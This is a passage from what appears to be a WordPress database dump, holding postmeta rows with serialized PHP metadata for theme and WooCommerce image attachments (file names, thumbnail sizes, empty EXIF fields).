e\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic5-300x72.png\";s:5:\"width\";i:300;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic5-150x98.png\";s:5:\"width\";i:150;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic5-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"landing-slide1-graphic5-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic5-100x98.png\";s:5:\"width\";i:100;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36,1817,'_wp_attached_file','2018/02/portfolio-img-15.jpg'),(37,1817,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-15.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38,611,'_wp_attachment_image_alt','o'),(39,3400,'_wp_attachment_image_alt','o'),(40,631,'_wp_attached_file','2018/01/h10-slide2-graphic3.jpg'),(41,631,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:714;s:6:\"height\";i:353;s:4:\"file\";s:31:\"2018/01/h10-slide2-graphic3.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide2-graphic3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-600x297.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-550x353.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-550x353.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide2-graphic3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-600x297.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(42,3401,'_wp_attached_file','2018/02/landing-slide1-graphic6.png'),(43,3401,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:205;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic6.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic6-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic6-300x170.png\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic6-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic6-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(44,1079,'_wp_attachment_image_alt','o'),(45,1301,'_wp_attachment_image_alt',''),(46,1081,'_wp_attached_file','2018/01/back-pear.jpg'),(47,1081,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:21:\"2018/01/back-pear.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"back-pear-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"back-pear-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"back-pear-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"back-pear-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"back-pear-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"back-pear-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"back-pear-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"back-pear-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"back-pear-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"back-pear-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"back-pear-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"back-pear-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"back-pear-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"back-pear-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"back-pear-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"back-pear-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"back-pear-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(48,1434,'_wp_attached_file','2018/01/full-width-img-1.jpg'),(49,1434,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1305;s:6:\"height\";i:870;s:4:\"file\";s:28:\"2018/01/full-width-img-1.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"full-width-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"full-width-img-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"full-width-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-550x870.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:870;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:29:\"full-width-img-1-1100x870.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:870;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"full-width-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(50,631,'_wp_attachment_image_alt','o'),(51,642,'_wp_attached_file','2018/01/h10-slide3-graphic1.jpg'),(52,642,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1085;s:4:\"file\";s:31:\"2018/01/h10-slide3-graphic1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide3-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-600x339.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:339;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h10-slide3-graphic1-1024x579.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:579;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h10-slide3-graphic1-1536x868.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:868;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h10-slide3-graphic1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h10-slide3-graphic1-550x1085.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic1-1100x1085.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide3-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-600x339.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:339;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(53,3401,'_wp_attachment_image_alt','o'),(54,1817,'_wp_attachment_image_alt','a'),(55,3402,'_wp_attached_file','2018/02/landing-slide1-graphic7.png'),(56,3402,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:516;s:6:\"height\";i:305;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic7.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic7-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic7-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic7-516x300.png\";s:5:\"width\";i:516;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic7-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic7-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(57,1818,'_wp_attached_file','2018/02/portfolio-img-16.jpg'),(58,1818,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-16.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-16-300x